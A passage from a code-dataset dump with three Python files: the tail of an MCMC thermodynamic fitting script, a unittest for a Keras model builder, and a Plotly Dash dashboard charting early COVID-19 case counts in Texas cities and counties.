D['sampler'] == 'pymultinest':\r\n flattrace = D['rawtrace']\r\n\r\n else:\r\n \"\"\"remove the tuning samples from the raw trace\r\n (nwalkers, nlinks, dim)\"\"\"\r\n trace = D['rawtrace'][:, -D['nlinks']:, :]\r\n \"\"\"obtain a flattened version of the chain\"\"\"\r\n flattrace = trace.reshape((D['nlinks']*D['nwalkers'],\r\n len(D['pname'])))\r\n\r\n nhyp_H = len(D['name_list_H'])\r\n hyp_H = np.mean(flattrace[:, -nhyp_H:], 0)\r\n print(nhyp_H)\r\n print(hyp_H.shape)\r\n\r\n nhyp_Cp = len(D['name_list_Cp'])\r\n hyp_Cp = np.mean(flattrace[:, -(nhyp_H+nhyp_Cp):-nhyp_H], 0)\r\n\r\n hypvec_Cp = np.zeros(D['Tt_Cp'].shape)\r\n for ii in range(nhyp_Cp):\r\n hypvec_Cp[D['It_Cp'] == ii] = hyp_Cp[ii]\r\n\r\n hypvec_H = np.zeros(D['Tt_H'].shape)\r\n for ii in range(nhyp_H):\r\n hypvec_H[D['It_H'] == ii] = hyp_H[ii]\r\n\r\n D['Etr_Cp'] = D['Et_Cp']/hypvec_Cp\r\n D['Etr_H'] = D['Et_H']/hypvec_H\r\n\r\n # save the trace and the posterior samples\r\n with open(D['outname'] + '.pkl', 'wb') as buff:\r\n pickle.dump(D, buff)\r\n\r\n \"\"\"perform post-processing and analyses on the sampled chains\"\"\"\r\n if D['sampler'] == 'pymultinest':\r\n flattrace = D['rawtrace']\r\n\r\n else:\r\n\r\n \"\"\"remove the tuning samples from the raw trace\r\n (nwalkers, nlinks, dim)\"\"\"\r\n trace = D['rawtrace'][:, -D['nlinks']:, :]\r\n\r\n \"\"\"obtain a flattened version of the chain\"\"\"\r\n flattrace = trace.reshape((D['nlinks']*D['nwalkers'], len(D['pname'])))\r\n\r\n \"\"\"compute convergence diagnostics\"\"\"\r\n\r\n # Rhat (Gelman, 2014.) diagnoses convergence by checking the mixing\r\n # of the chains as well as their stationarity. Rhat should be less than\r\n # 1.1 for each variable of interest\r\n Rhat = cc.gelman_diagnostic(trace, D['pname'])\r\n msg = \"Rhat: %s\" % Rhat\r\n cc.WP(msg, D['wrt_file'])\r\n\r\n # neff (Gelman, 2014.) gives the effective number of samples for\r\n # each variable of interest. It should be greater than 10\r\n # for each variable\r\n neff = cc.effective_n(trace, D['pname'])\r\n msg = \"effective sample size: %s\" % neff\r\n cc.WP(msg, D['wrt_file'])\r\n\r\n cp.plot_chains(D['rawtrace'], flattrace, D['nlinks'], D['pname'],\r\n D['pname_plt'], pltname=D['outname'])\r\n cp.plot_squiggles(D['rawtrace'], 0, 1, D['pname_plt'],\r\n pltname=D['outname'])\r\n\r\n \"\"\"perform various analyses\"\"\"\r\n msg = \"sampling time: \" + str(D['sampling_time']) + \" seconds\"\r\n WP(msg, D['wrt_file'])\r\n\r\n msg = \"model evidence: \" + str(D['lnZ']) + \\\r\n \" +/- \" + str(D['dlnZ'])\r\n cc.WP(msg, D['wrt_file'])\r\n\r\n cc.coef_summary(flattrace, D['pname'], D['outname'])\r\n\r\n nxtprior = np.zeros((2, D['nparam']))\r\n nxtprior[0, :] = np.mean(flattrace, 0) - 5*np.std(flattrace, 0)\r\n nxtprior[1, :] = 10*np.std(flattrace, 0)\r\n np.savetxt(D['outname'] + '_prior.csv', nxtprior)\r\n\r\n cp.plot_hist(flattrace, D['pname'], D['pname_plt'], pltname=D['outname'])\r\n\r\n cp.plot_cov(flattrace, D['pname_plt'], pltname=D['outname'],\r\n tight_layout=False)\r\n\r\n \"\"\"configure model prediction plots for Cp, H, S and G\"\"\"\r\n name_list_l = [D['name_list_Cp'], D['name_list_H'], None, None]\r\n Tt_l = [D['Tt_Cp'], D['Tt_H'], None, None]\r\n At_l = [D['At_Cp'], D['At_H'], None, None]\r\n It_l = [D['It_Cp'], D['It_H'], None, None]\r\n pltper = [3, 1, 1, 1]\r\n xlim = [[(1e-10, 3000), (1e-10, 250), (1e-10, 30)],\r\n [(1e-10, 3000)],\r\n [(1e-10, 3000)],\r\n [(1e-10, 3000)]]\r\n ylim = [[None, (-2, 27), (-.5, 5)],\r\n [None],\r\n [None],\r\n [None]]\r\n on = D['outname']\r\n pltname = [[on + 'Cp', on + 'Cp_close', on + 'Cp_vclose'],\r\n [on + 'H'],\r\n [on + 'S'],\r\n [on + 'G']]\r\n xlabel = [3*[r\"$T (K)$\"],\r\n [r\"$T (K)$\"],\r\n [r\"$T (K)$\"],\r\n [r\"$T (K)$\"]]\r\n ylabel = [3*[r\"$C_p \\left(J {mol}^{-1} K^{-1}\\right)$\"],\r\n [r\"$H \\left(J {mol}^{-1} \\right)$\"],\r\n [r\"$S \\left(J {mol}^{-1} K^{-1}\\right)$\"],\r\n [r\"$G \\left(J {mol}^{-1} \\right)$\"]]\r\n legend_loc = [[None, None, 'upper left'],\r\n ['upper left'],\r\n [None],\r\n [None]]\r\n\r\n cp.plot_prediction_all(flattrace, name_list_l,\r\n Tt_l, At_l, It_l,\r\n pltper,\r\n feval_Cp_plt, feval_H_plt,\r\n deb_Cp=deb_Cp,\r\n xlim=xlim, ylim=ylim, pltname=pltname,\r\n xlabel=xlabel, ylabel=ylabel,\r\n legend_loc=legend_loc)\r\n","sub_path":"alpha_quart_debye.py","file_name":"alpha_quart_debye.py","file_ext":"py","file_size_in_byte":15790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"339042082","text":"import unittest\n\nimport mrbuilder_keras as mrb\n\n\nclass BuilderTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n super().setUpClass()\n mrb.load()\n\n cls.input_shape = [32, 32, 3]\n\n cls.base_params = {\n \"outputSize\": 50\n }\n\n def test_vgg16(self):\n model_builder = mrb.get_model(\"vgg16\")\n model = model_builder(self.input_shape, self.base_params)\n layers = model.layers\n self.assertEqual(len(layers),\n 65,\n \"number of layers is not correct\")\n # noinspection PyTypeChecker\n self.assertEqual(layers[0].input.shape.as_list(),\n [None] + self.input_shape,\n \"input shape is not correct\")\n self.assertEqual(layers[-1].output.shape[1],\n self.base_params[\"outputSize\"],\n \"output shape is not correct\")\n\n def test_squeezenet(self):\n model_builder = mrb.get_model(\"squeezenet\")\n params = {\n **self.base_params,\n \"initialConv\": 64,\n \"initialSqueeze\": 16\n }\n model = model_builder(self.input_shape, params)\n layers = model.layers\n self.assertEqual(layers[1].output.shape[-1],\n params[\"initialConv\"],\n \"output shape is not correct\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_model_library.py","file_name":"test_model_library.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"104078453","text":"#Creating dashboard of covid cases\n\nimport pandas as pd\nimport plotly.express as px\nimport plotly.graph_objects as go\n#import numpy as np\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport numpy as np\nimport datetime as dt\nfrom datetime import datetime\n\n#Austin: http://www.austintexas.gov/COVID19\n#Dallas: https://www.dallascounty.org/covid-19/\n#Harris: http://publichealth.harriscountytx.gov/Resources/2019-Novel-Coronavirus/Harris-County-COVID-19-Confirmed-Cases\n#Texas : https://txdshs.maps.arcgis.com/apps/opsdashboard/index.html#/ed483ecd702b4298ab01e8b9cafc8b83\n\n#John hopkins data: https://github.com/CSSEGISandData/COVID-19\n#https://public.tableau.com/profile/christopher.paolini#!/vizhome/COVID-19Dashboard_15850633730350/UnitedStatesCOVID-19CaseTracker\n#url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Confirmed.csv'\n# https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Confirmed.csv'\n\nloadnewdata = False\n\n\ncolors = {\n 'background': '#F5F5F5',\n 'text': '#484848',\n 'plotbg': '#FDFDFD'\n }\n\n\nif loadnewdata:\n #globalcases = pd.read_csv(url, error_bad_lines=False)\n globalcases = pd.read_csv('jhdata_20200323.csv')\n texascases = globalcases[globalcases['Province/State']=='Texas'].iloc[0,4:]\n\n #Find first data for texas\n casestart = texascases > 0\n texascases = texascases[casestart]\n texascases.to_csv('texascases.csv')\n\n\n\n\n#First, get growth rate csv\ngr = pd.read_csv('gr_rate.csv')\ngrdate = gr['Date']\ngrt = (gr['Texas']-1)*100\ngra = (gr['Austin']-1)*100\ngrd = (gr['Dallas']-1)*100\ngrh = (gr['Harris']-1)*100\n\n\ntrace1 = go.Scatter(x = grdate, y = grt, name=\"Texas\", mode=\"lines+markers\")\ntrace2 = go.Scatter(x = grdate, y = gra, name=\"Austin\", mode=\"lines+markers\")\ntrace3 = go.Scatter(x = grdate, y = grd, name=\"Dallas\", mode=\"lines+markers\")\ntrace4 = go.Scatter(x = grdate, y = grh, name=\"Harris\", mode=\"lines+markers\")\ndata = [trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n title={'text':'Growth rate over time (7 day intervals)',\n 'x':0.5,'y':0.9,\n 'xanchor':'center','yanchor':'top'},\n yaxis=dict(\n title='Growth rate [%]',\n linecolor=colors['text'],\n linewidth=2,\n mirror=True,\n showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside', fixedrange=True,automargin=True),\n xaxis_title='Date',\n autosize=True,\n paper_bgcolor=colors['background'],\n plot_bgcolor=colors['plotbg'],\n font=dict(color=colors['text'],size=10),\n legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n )\n\nfig_gr=go.Figure(data, layout=layout)\n\n\ntexascases = pd.read_csv('texascases.csv')\nx = texascases.iloc[:,0]\ny = texascases.iloc[:,1]\ny1 = texascases.iloc[:,2]\ny2 = texascases.iloc[:,3]\n#x = texascases[casestart].index.values\n#y = texascases[casestart]\n\n\naustincases = pd.read_excel('AustinCases.xlsx', sheet_name='Austin')\nhoustoncases = pd.read_csv('Harris.csv')\ndallascases = pd.read_csv('Dallas.csv')\n#print(austincases.head())\n\n\n\n#####################AUSTIN #Linear\ntrace1 = go.Scatter(x=austincases['Date'], y=austincases['Cumulative Cases'], name=\"Linear\", mode = 'lines+markers')\n#trace2 = go.Scatter(x=austincases['Date'], y=austincases['Cumulative Cases'], yaxis='y2', name=\"Logarithmic\",mode = 'lines+markers', visible=False)\ntrace2 = go.Scatter(x=austincases['Date'], y=austincases['Cumulative Cases'], name=\"Logarithmic\",mode = 'lines+markers', visible=False)\n\n\n#ESTIMATE FOR AUSTIN\nlstdate = (austincases['Date'][len(austincases)-1])\nlstdate = datetime.strptime(lstdate, '%m/%d/%y')\nlstdate += dt.timedelta(days=1)\nlstdate = lstdate.strftime('%m/%d/%y')\n#print(lstdate)\nxt = np.arange(len(austincases['Date'])+1)\nyt1 = np.round( np.exp(xt[:6]*0.5)*3)\n#print(yt1)\nyt2 = np.round(np.exp(np.arange(len(xt[6:]))*0.140)*55)\n#print(yt2)\n#print(np.append(yt1, yt2))\nyt = np.append(yt1, yt2)\nnewdate = (austincases['Date'].copy())\nnewdate = newdate.append(pd.Series(lstdate))\n\ntrace3 = go.Scatter(x = newdate, y = yt, name='Best Fit+Estimate', visible=False, mode='lines+markers', line={'dash':'dash', 'color':'black'})\n\n\ndata = [trace1, trace2, trace3]\nlayout = go.Layout(\n title={'text':'Total Cases in Austin, TX',\n 'x':0.5,'y':0.9,\n 'xanchor':'center','yanchor':'top'},\n yaxis=dict(\n title='Total',\n linecolor=colors['text'],\n linewidth=2,\n mirror=True,\n #type=\"linear\",\n showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n #type='log'),\n # yaxis2=dict(\n # title='Count',\n # overlaying='y',\n #side='right',\n # type='log',\n # showgrid=False,ticks='outside',tickvals=[0,10,100],fixedrange=True,automargin=True,visible=False\n # ),\n xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside', fixedrange=True,automargin=True),\n xaxis_title='Date',\n autosize=True,\n #width=1000,\n #height=1000,\n paper_bgcolor=colors['background'],\n plot_bgcolor=colors['plotbg'],\n font=dict(color=colors['text'],size=10),\n legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n )\n\nfig2=go.Figure(data, layout=layout)\nfig2.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"left\",\n buttons=list([\n dict(\n args=[{'visible':[True, False, False]},\n {'yaxis':{'type':'linear', 'title':'Total', 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n # {'yaxis':{'visible':[True, False]}}],\n label=\"linear\",\n method=\"update\",\n \n ),\n dict(\n args=[{'visible':[False, True, True]},\n {'yaxis':{'type':'log', 'title':'Total', 'tickvals':[0,10,100], 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n #{'yaxis':{'visible':[False,True]}}],\n label=\"log\",\n method=\"update\"\n )\n ]),\n pad={\"r\": 10, \"t\": 10},\n showactive=True,\n bgcolor='white',\n \n x=0.04,\n xanchor=\"left\",\n y=0.95,\n yanchor=\"top\"\n )\n ]\n )\n\n\n###############DALLAS\n\ntrace1 = go.Scatter(x=dallascases['Date'], y=dallascases['Count'], name=\"Linear\", mode = 'lines+markers')\ntrace2 = go.Scatter(x=dallascases['Date'], y=dallascases['Count'], name=\"Logarithmic\",mode = 'lines+markers', visible=False)\n#trace2 = go.Scatter(x=dallascases['Date'], y=dallascases['Count'], yaxis='y2', name=\"Logarithmic\",mode = 'lines+markers')\n\ndata = [trace1, trace2]\nlayout_d = go.Layout(\n title={'text':'Total Cases in Dallas, TX',\n 'x':0.5,'y':0.9,\n 'xanchor':'center','yanchor':'top'},\n yaxis=dict(\n title='Total',\n linecolor=colors['text'],\n linewidth=2,\n mirror=True,\n showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n #type='log'),\n # yaxis2=dict(\n # title='Log',\n # overlaying='y',\n # side='right',\n # type='log',\n # showgrid=False,ticks='outside',tickvals=[0,10,100],fixedrange=True,automargin=True\n # ),\n xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n xaxis_title='Date',\n autosize=True,\n #width=1000,\n #height=1000,\n paper_bgcolor=colors['background'],\n plot_bgcolor=colors['plotbg'],\n font=dict(color=colors['text'],size=10),\n legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n )\n\nfig2d=go.Figure(data, layout=layout_d)\nfig2d.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"left\",\n buttons=list([\n dict(\n args=[{'visible':[True, False]},\n {'yaxis':{'type':'linear', 'title':'Total', 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n # {'yaxis':{'visible':[True, False]}}],\n label=\"linear\",\n method=\"update\",\n \n ),\n dict(\n args=[{'visible':[False, True]},\n {'yaxis':{'type':'log', 'title':'Total', 'tickvals':[0,10,100], 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n #{'yaxis':{'visible':[False,True]}}],\n label=\"log\",\n method=\"update\"\n )\n ]),\n pad={\"r\": 10, \"t\": 10},\n showactive=True,\n bgcolor='white',\n \n x=0.04,\n xanchor=\"left\",\n y=0.95,\n yanchor=\"top\"\n )\n ]\n )\n\n###############HARRIS\ntrace1 = go.Scatter(x=houstoncases['Date'], y=houstoncases['Count'], name=\"Linear\", mode = 'lines+markers')\ntrace2 = go.Scatter(x=houstoncases['Date'], y=houstoncases['Count'], name=\"Logarithmic\",mode = 'lines+markers', visible=False)\n\ndata = [trace1, trace2]\nlayout_h = go.Layout(\n title={'text':'Total Cases in Harris County, TX',\n 'x':0.5,'y':0.9,\n 'xanchor':'center','yanchor':'top'},\n yaxis=dict(\n title='Total',\n linecolor=colors['text'],\n linewidth=2,\n mirror=True,\n showgrid=False,ticks='outside',fixedrange=True,automargin=True),\n #type='log'),\n \n xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside',automargin=True,fixedrange=True),\n xaxis_title='Date',\n autosize=True,\n #width=1000,\n #height=1000,\n paper_bgcolor=colors['background'],\n plot_bgcolor=colors['plotbg'],\n font=dict(color=colors['text'],size=10),\n legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n )\n\nfig2h=go.Figure(data, layout=layout_h)\nfig2h.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"left\",\n buttons=list([\n dict(\n args=[{'visible':[True, False]},\n {'yaxis':{'type':'linear', 'title':'Total', 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n # {'yaxis':{'visible':[True, False]}}],\n label=\"linear\",\n method=\"update\",\n \n ),\n dict(\n args=[{'visible':[False, True]},\n {'yaxis':{'type':'log', 'title':'Total', 'tickvals':[0,10,100], 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n #{'yaxis':{'visible':[False,True]}}],\n label=\"log\",\n method=\"update\"\n )\n ]),\n pad={\"r\": 10, \"t\": 10},\n showactive=True,\n bgcolor='white',\n \n x=0.04,\n xanchor=\"left\",\n y=0.95,\n yanchor=\"top\"\n )\n ]\n )\n\n\n\n\n\n\n\n\n########TEXAS\n\n\ntrace1 = go.Scatter(x=x, y=y, name=\"Point1-Linear\",mode = 'lines+markers')\ntrace1A = go.Scatter(x = x, y = y2, name=\"JHU-Linear\", mode='lines+markers')\ntrace2 = go.Scatter(x=x, y=(y2+y)*0.5, name=\"Average-Logarithmic\",mode = 'lines+markers', visible=False)\n\n\n#ESTIMATE FOR TEXAS\nlstdate = x[len(x)-1]\nlstdate = datetime.strptime(lstdate, '%m/%d/%y')\nlstdate += dt.timedelta(days=1)\nlstdate = lstdate.strftime('%m/%d/%y')\n#print(lstdate)\nxt = np.arange(len(x[3:])+1)\n\nyt = np.round(np.exp(xt*0.272)*3.57) #np.append(yt1, yt2)\n#print(yt)\nnewdate = x[3:].copy()\nnewdate = newdate.append(pd.Series(lstdate))\n#print(yt)\n#x = sdfsfsd\ntrace3 = go.Scatter(x = newdate, y = yt, name='Best Fit+Estimate', visible=False, mode='lines+markers', line={'dash':'dash', 'color':'black'})\n\n\ndata2 = [trace1, trace1A, trace2, trace3]\nlayout2 = go.Layout(\n title={'text':'Total Cases in Texas',\n 'x':0.5,'y':0.9,\n 'xanchor':'center','yanchor':'top'},\n\n yaxis=dict(\n title='Total',\n linecolor=colors['text'],\n linewidth=2,\n mirror=True,\n showgrid=False,ticks='outside',automargin=True,fixedrange=True),\n #type='log'),\n\n xaxis=dict(linewidth=2,linecolor=colors['text'],mirror=True,showgrid=False,ticks='outside',automargin=True,fixedrange=True),\n xaxis_title='Date',\n #autosize=True,\n #width=1000,\n #height=500,\n paper_bgcolor=colors['background'],\n plot_bgcolor=colors['plotbg'],\n font=dict(color=colors['text'],size=10),\n legend=dict(x=0,y=1,bgcolor=colors['plotbg'],orientation='h')\n )\n\nfig3=go.Figure(data2, layout=layout2)\nfig3.update_yaxes(tick0=20)\n\nfig3.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"left\",\n buttons=list([\n dict(\n args=[{'visible':[True, True, False, False]},\n {'yaxis':{'type':'linear', 'title':'Total', 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n # {'yaxis':{'visible':[True, False]}}],\n label=\"linear\",\n method=\"update\",\n \n ),\n dict(\n args=[{'visible':[False, False, True, True]},\n {'yaxis':{'type':'log', 'title':'Total', 'tickvals':[0,10,100, 1000], 'ticks':'outside', 'fixedrange':True, 'automargin':True,\n 'linewidth':2, 'mirror':True, 'linecolor':colors['text']}}],\n #{'yaxis':{'visible':[False,True]}}],\n label=\"log\",\n method=\"update\"\n )\n ]),\n pad={\"r\": 10, \"t\": 10},\n showactive=True,\n bgcolor='white',\n \n x=0.04,\n xanchor=\"left\",\n y=0.85,\n yanchor=\"top\"\n )\n ]\n )\n\n\n\n#fig2.update_xaxes(automargin=True)\n#fig2.show(config={'scrollZoom': True})\n#y = austincases['Cumulative Cases'].to_numpy()\n#fig2.add_trace(go.Scatter(x=austincases['Date'][1:], y=y))\n#fig2.update_layout(yaxis_type='log')\n\n\n\n\n\nexternal_stylesheets = [\n 'https://codepen.io/chriddyp/pen/bWLwgP.css',\n {\n 'href': 'https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',\n 'rel': 'stylesheet',\n 'integrity': 'sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO',\n 'crossorigin': 'anonymous'\n }\n]\n\n#external_scripts = [{'type':\"text/javascript\",'src':'https://www.statcounter.com/counter/counter.js'}]\napp = dash.Dash(__name__, assets_external_path='http://assets/')#, external_scripts=external_scripts)\n#app = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n#app.scripts.append_script({\"external_url\": ['https://www.statcounter.com/counter/counter.js',\napp.title = 'Tracking COVID-19 cases in Austin and Texas'\n\n\n\n\n#app.css.append_css({\n# 'external_url': 'https://codepen.io/chriddyp/pen/bWLwgP.css'\n#})\n\n#app.scripts.config.serve_locally = False\n#app.css.append_css({'external_url':'/base.css'})\n\n\n\napp.layout = html.Div(style={'backgroundColor':colors['background'],'textAlign':'center', 'max-width':'1200px',\n 'border':'thick solid black', 'margin-left':'auto', 'margin-right':'auto', 'id':'grid'},\n children=[\n html.H1(children='Keeping track of COVID19 in Texas',\n style={'textAlign':'center',\n 'color':colors['text']}),\n html.H5(style={'color':colors['text']},children='Austin data updated on 4/1/20. Texas data updated 4/1/20.'),\n html.Div([\n html.Div(),\n html.Div([dcc.Graph(figure=fig3,\n config={'scrollZoom':True,'responsive':True})], className=\"eight columns\"),\n html.Div([dcc.Graph(figure=fig2,\n config={'scrollZoom':True,'responsive':True})], className=\"eight columns\"),\n html.Div([dcc.Graph(figure=fig2d,\n config={'scrollZoom':True,'responsive':True})], className=\"eight columns\"),\n html.Div([dcc.Graph(figure=fig2h,\n config={'scrollZoom':True,'responsive':True})], className=\"eight columns\"),\n html.Div([dcc.Graph(figure=fig_gr,\n config={'scrollZoom':True,'responsive':True})], className=\"eight columns\")],\n className=\"row\"),\n html.H5(style={'color':colors['text']},children='Data sources: Texas data obtained from John Hopkins data set (https://github.com/CSSEGISandData) and https://coronavirus.1point3acres.com/. Austin, Dallas, Harris County data obtained from John Hopkins, Travis County, and USA Facts (https://usafacts.org/visualizations/coronavirus-covid-19-spread-map/). Delayed reporting results in slight discrepencies.')\n\n]\n\n )\n\n\n#Create responsive site via https://www.w3schools.com/html/html_responsive.asp\napp.index_string = '''\n\n\n \n \n \n \n \n \n \n \n {%metas%}\n {%title%}\n {%favicon%}\n {%css%}\n \n \n {%app_entry%}\n